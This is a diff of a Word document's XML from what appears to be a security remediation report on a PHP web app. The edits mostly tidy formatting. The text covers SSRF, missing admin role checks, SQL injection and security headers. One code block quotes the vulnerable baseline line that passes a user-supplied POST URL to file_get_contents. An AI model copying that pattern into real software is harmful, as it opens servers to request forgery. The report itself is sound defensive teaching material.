           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>}</w:t>
       </w:r>
     </w:p>
@@ -4345,30 +3266,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">This is combined with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>SameSite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>=Lax on the session cookie as defence in depth: even a same-site navigation cannot silently include the session cookie in a cross-origin POST originating from a different site.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>This is combined with SameSite=Lax on the session cookie as defence in depth: even a same-site navigation cannot silently include the session cookie in a cross-origin POST originating from a different site.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -4391,10 +3294,10 @@
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -4405,44 +3308,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">$content = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>file_get_contents</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>($_POST['</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>url</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>']); // fetches ANY URL, follows redirects</w:t>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>$content = file_get_contents($_POST['url']); // fetches ANY URL, follows redirects</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4478,54 +3352,15 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Remediation is layered in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>UrlGuard</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>::</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>isAllowed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>():</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:t>Remediation is layered in UrlGuard::isAllowed():</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -4540,10 +3375,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -4558,10 +3393,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -4576,10 +3411,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -4595,10 +3430,10 @@
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -4609,69 +3444,30 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>curl_setopt_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>array</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>ch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>, [</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>curl_setopt_array($ch, [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    CURLOPT_FOLLOWLOCATION =&gt; false,</w:t>
       </w:r>
       <w:r>
@@ -4680,7 +3476,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    CURLOPT_PROTOCOLS      =&gt; CURLPROTO_HTTPS,</w:t>
       </w:r>
       <w:r>
@@ -4689,7 +3492,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    CURLOPT_TIMEOUT        =&gt; 3,</w:t>
       </w:r>
       <w:r>
@@ -4698,7 +3508,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    CURLOPT_MAXFILESIZE    =&gt; 65536,</w:t>
       </w:r>
       <w:r>
@@ -4707,13 +3524,20 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>]);</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -4730,25 +3554,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Finding: the admin area's only protection was hiding the navigation link for non-admin users; the admin pages themselves performed no server-side role check, so any authenticated student could reach /admin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>index.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> simply by typing the URL.</w:t>
+        <w:t>Finding: the admin area's only protection was hiding the navigation link for non-admin users; the admin pages themselves performed no server-side role check, so any authenticated student could reach /admin/index.php simply by typing the URL.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4761,44 +3567,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Remediation: every file under public/admin/ begins by calling </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Auth::</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>requireAdmin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>(), which re-checks the session's role independently of the UI and logs a denial:</w:t>
+        <w:t>Remediation: every file under public/admin/ begins by calling Auth::requireAdmin(), which re-checks the session's role independently of the UI and logs a denial:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -4809,71 +3587,46 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">public static function </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>requireAdmin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>): array {</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">    $user = self::</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>requireLogin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>();</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>public static function requireAdmin(): array {</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $user = self::requireLogin();</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    if ($user['role'] !== 'admin') {</w:t>
       </w:r>
       <w:r>
@@ -4882,97 +3635,46 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">        Logger::log('</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>authorization_denied</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>', $user['email'], Logger::</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>clientIp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>(), ['</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>required_role</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>' =&gt; 'admin']);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>http_response_code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>(403);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        Logger::log('authorization_denied', $user['email'], Logger::clientIp(), ['required_role' =&gt; 'admin']);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        http_response_code(403);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">        echo 'Forbidden';</w:t>
       </w:r>
       <w:r>
@@ -4981,7 +3683,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">        exit;</w:t>
       </w:r>
       <w:r>
@@ -4990,7 +3699,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
       <w:r>
@@ -4999,7 +3715,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    return $user;</w:t>
       </w:r>
       <w:r>
@@ -5008,7 +3731,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>}</w:t>
       </w:r>
     </w:p>
@@ -5027,23 +3757,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>The admin student</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>search feature also demonstrates the same SQL-injection remediation from Section 4.2 applied to a second query (LIKE-based search), since the vulnerable baseline built that query with the same string-concatenation pattern.</w:t>
+        <w:t>The admin student search feature also demonstrates the same SQL-injection remediation from Section 4.2 applied to a second query (LIKE-based search), since the vulnerable baseline built that query with the same string-concatenation pattern.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5113,11 +3827,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>5.5 Security Misconfiguration</w:t>
       </w:r>
     </w:p>
@@ -5136,10 +3849,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -5154,38 +3867,28 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>display_errors</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> defaults to off and only turns on when APP_DEBUG=true is explicitly set — a missing .env file therefore does not accidentally enable verbose errors in production.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>display_errors defaults to off and only turns on when APP_DEBUG=true is explicitly set — a missing .env file therefore does not accidentally enable verbose errors in production.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -5195,33 +3898,15 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">A global security-headers middleware applies Content-Security-Policy, X-Content-Type-Options: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>nosniff</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>, X-Frame-Options: DENY, Referrer-Policy: same-origin, Permissions-Policy, and (outside debug mode) Strict-Transport-Security to every response.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:t>A global security-headers middleware applies Content-Security-Policy, X-Content-Type-Options: nosniff, X-Frame-Options: DENY, Referrer-Policy: same-origin, Permissions-Policy, and (outside debug mode) Strict-Transport-Security to every response.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -5231,30 +3916,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>File uploads are validated by sniffing actual file content (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
